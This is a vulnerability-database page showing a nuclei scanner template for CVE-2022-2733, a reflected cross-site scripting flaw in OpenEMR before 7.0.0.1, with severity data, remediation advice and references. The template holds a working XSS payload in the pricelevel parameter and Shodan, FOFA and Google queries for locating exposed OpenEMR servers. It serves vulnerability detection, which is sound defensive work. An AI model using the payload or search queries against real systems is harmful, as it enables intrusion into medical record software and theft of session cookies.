Lucene search
K

Openemr < 7.0.0.1 - Cross-Site Scripting

🗓️ 25 Jun 2026 01:31:50Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

Openemr < 7.0.0.1 - Cross-Site Scripting vulnerability in OpenEM

Related
Refs
Code
ReporterTitlePublishedViews
Family
Huntr
Cross-site Scripting - Reflected
2 Aug 202207:53
huntr
ATTACKERKB
CVE-2022-2733
9 Aug 202212:15
attackerkb
Circl
CVE-2022-2733
9 Aug 202216:24
circl
CNNVD
OpenEMR 跨站脚本漏洞
9 Aug 202200:00
cnnvd
CVE
CVE-2022-2733
9 Aug 202212:05
cve
Cvelist
CVE-2022-2733 Cross-site Scripting (XSS) - Reflected in openemr/openemr
9 Aug 202212:05
cvelist
NVD
CVE-2022-2733
9 Aug 202212:15
nvd
OSV
CVE-2022-2733 Cross-site Scripting (XSS) - Reflected in openemr/openemr
9 Aug 202212:05
osv
Prion
Cross site scripting
9 Aug 202212:15
prion
Positive Technologies
PT-2022-18376 · Openemr · Openemr
9 Aug 202200:00
ptsecurity
Rows per page
id: CVE-2022-2733

info:
  name: Openemr < 7.0.0.1 - Cross-Site Scripting
  author: ctflearner
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade Openemr to version 7.0.0.1 or later to mitigate this vulnerability.
  reference:
    - https://huntr.dev/bounties/25b91301-dfb0-4353-a732-e051bbe8420c/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2733
    - https://github.com/openemr/openemr/commit/59458bc15ab0cb556c521de9d5187167d6f88945
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-2733
    cwe-id: CWE-79
    epss-score: 0.95839
    epss-percentile: 0.99863
    cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: open-emr
    product: openemr
    shodan-query:
      - title:"OpenEMR"
      - http.html:"openemr"
      - http.title:"openemr"
      - http.favicon.hash:1971268439
    fofa-query:
      - icon_hash=1971268439
      - body="openemr"
      - title="openemr"
      - app="openemr"
    google-query: intitle:"openemr"
  tags: cve,cve2022,xss,openemr,authenticated,huntr,open-emr,vuln

http:
  - raw:
      - |
        POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/interface/login/login.php?site=default

        new_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1
      - |
        GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=a onerror=alert(document.cookie)>'
          - 'pricelevel'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220562fef8846eb14f8e7ff369227bd6344afc35f39c6ba75efb424cd76ea211b95022054dcaaaaaaf350fec15efac9d4dd91a88bd8809fce89bcb4bcdc8c581fdca48c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.16.1
CVSS 39.6
EPSS0.95839
29